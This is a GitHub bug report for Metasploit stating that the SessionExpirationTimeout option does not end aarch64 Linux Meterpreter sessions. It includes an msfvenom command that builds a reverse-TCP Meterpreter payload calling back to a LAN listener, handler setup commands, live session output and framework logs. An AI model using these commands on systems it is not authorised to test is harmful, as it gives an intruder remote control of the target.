metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

SessionExpirationTimeout option not working in payload/linux/aarch64/meterpreter_reverse_tcp

Open xyzzklk opened this issue 1 year ago • 4 comments

Steps to reproduce

How'd you do it?

  1. I generated a payload using the command msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.165 LPORT=3000 -f elf --platform linux --arch aarch64 -o /home/xyzzklkuser/test SessionExpirationTimeout=30 SessionCommunicationTimeout=300 SessionRetryTotal=15 SessionRetryWait=1.
  2. I started an exploit/multi/handler on my Ubuntu PC, and set the same PAYLOAD, LHOST and LPORT.
  3. I ran the payload on an aarch64 Kali Linux device.
  4. A meterpreter session opened. Everything's fine until now.
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  27        meterpreter aarch64/  root @ localhost.loca  192.168.1.165:3000 ->
            linux                 ldomain                 192.168.1.198:52950
                                                         (192.168.1.198)

C&C: Ubuntu Desktop 23 x64 client: Kali Linux on aarch64

Were you following a specific guide/tutorial or reading documentation?

I'm not.

Expected behavior

Session should die after session has been established for 30s, since SessionExpirationTimeout is 30. It should be like this:

[*] 192.168.1.198 - Meterpreter Session 27 closed. Reason: Died

Current behavior

Nothing happened after a long time. Session is still active, and can be chosen to interact with.

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  27        meterpreter aarch64/  root @ localhost.loca  192.168.1.165:3000 ->
            linux                 ldomain                 192.168.1.198:52950
                                                         (192.168.1.198)

msf6 exploit(multi/handler) > sessions -i 27
[*] Starting interaction with 27...

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Debian  (Linux 5.10.101-android12-9-00001-gf4c0e37dbcde-ab8596533)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter >

Metasploit version

msf6 exploit(multi/handler) > version
Framework: 6.3.48-dev-
Console  : 6.3.48-dev-
msf6 exploit(multi/handler) >

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse 
[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/multi/handler

[multi/handler]
PAYLOAD=linux/x64/meterpreter_reverse_tcp
LHOST=192.168.1.165
LPORT=3000
ExitOnSession=false
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ListenerTimeout=0

Database Configuration

The database contains the following information:

Collapse 
Session Type: Connected to msf. Connection type: postgresql.
ID Hosts Vulnerabilities Notes Services
1 (Current) 2 2 2 0
Total (1) 2 2 2 0

History

The following commands were ran during the session and before this issue occurred:

Collapse 
153    set loglevel 3
154    use exploit/multi/handler
155    set PAYLOAD linux/x64/meterpreter_reverse_tcp
156    set LHOST 192.168.1.165
157    set LPORT 3000
158    set ExitOnSession false
159    exploit -j
160    debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse 
[01/13/2024 19:50:55] [e(0)] core: Errno::ENOENT No such file or directory - git
[01/13/2024 19:50:57] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:50:57] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:50:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/13/2024 19:51:01] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/13/2024 19:53:42] [e(0)] core: Errno::ENOENT No such file or directory - git
[01/13/2024 19:53:43] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:53:43] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:53:46] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/13/2024 19:53:47] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse 
msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse 
[01/13/2024 19:27:32] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (15)
[01/13/2024 19:27:37] [d(0)] core: Session 15 failed to respond to an echo command
[01/13/2024 19:27:39] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (16)
[01/13/2024 19:27:44] [d(0)] core: Session 16 failed to respond to an echo command
[01/13/2024 19:27:45] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (17)
[01/13/2024 19:27:50] [d(0)] core: Session 17 failed to respond to an echo command
[01/13/2024 19:27:52] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (18)
[01/13/2024 19:27:57] [d(0)] core: Session 18 failed to respond to an echo command
[01/13/2024 19:27:59] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (19)
[01/13/2024 19:28:04] [d(0)] core: Session 19 failed to respond to an echo command
[01/13/2024 19:28:06] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (20)
[01/13/2024 19:28:11] [d(0)] core: Session 20 failed to respond to an echo command
[01/13/2024 19:28:13] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (21)
[01/13/2024 19:28:13] [w(0)] core: Exception in scheduler thread EOFError EOFError
[01/13/2024 19:28:22] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (22)
[01/13/2024 19:28:27] [d(0)] core: Session 22 failed to respond to an echo command
[01/13/2024 19:28:29] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (23)
[01/13/2024 19:28:34] [d(0)] core: Session 23 failed to respond to an echo command
[01/13/2024 19:28:36] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (24)
[01/13/2024 19:28:41] [d(0)] core: Session 24 failed to respond to an echo command
[01/13/2024 19:28:43] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (25)
[01/13/2024 19:28:48] [d(0)] core: Session 25 failed to respond to an echo command
[01/13/2024 19:28:52] [w(0)] core: Exception in scheduler thread EOFError EOFError
[01/13/2024 19:29:23] [e(0)] core: Exploit failed (multi/handler): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:3000). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:3000).
[01/13/2024 19:50:55] [e(0)] core: Errno::ENOENT No such file or directory - git
[01/13/2024 19:50:57] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:50:57] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:50:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/13/2024 19:51:01] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/13/2024 19:52:09] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: reverse to reverse
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: bind to reverse
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: noconn to reverse
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: none to reverse
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: tunnel to reverse
[01/13/2024 19:52:23] [d(1)] core: Module linux/x64/meterpreter_reverse_tcp is compatible with multi/handler
[01/13/2024 19:53:07] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[01/13/2024 19:53:42] [e(0)] core: Errno::ENOENT No such file or directory - git
[01/13/2024 19:53:43] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:53:43] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:53:46] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/13/2024 19:53:47] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/13/2024 19:54:41] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: reverse to reverse
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: bind to reverse
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: noconn to reverse
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: none to reverse
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: tunnel to reverse
[01/13/2024 19:54:57] [d(1)] core: Module linux/x64/meterpreter_reverse_tcp is compatible with multi/handler
[01/13/2024 19:55:44] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse 
msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse 
Framework: 6.3.48-dev-
Ruby: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
OpenSSL: OpenSSL 1.1.1m  14 Dec 2021
Install Root: /snap/metasploit-framework/1160/opt/metasploit-framework/embedded/framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Omnibus Installer

xyzzklk avatar Jan 13 '24 09:01 xyzzklk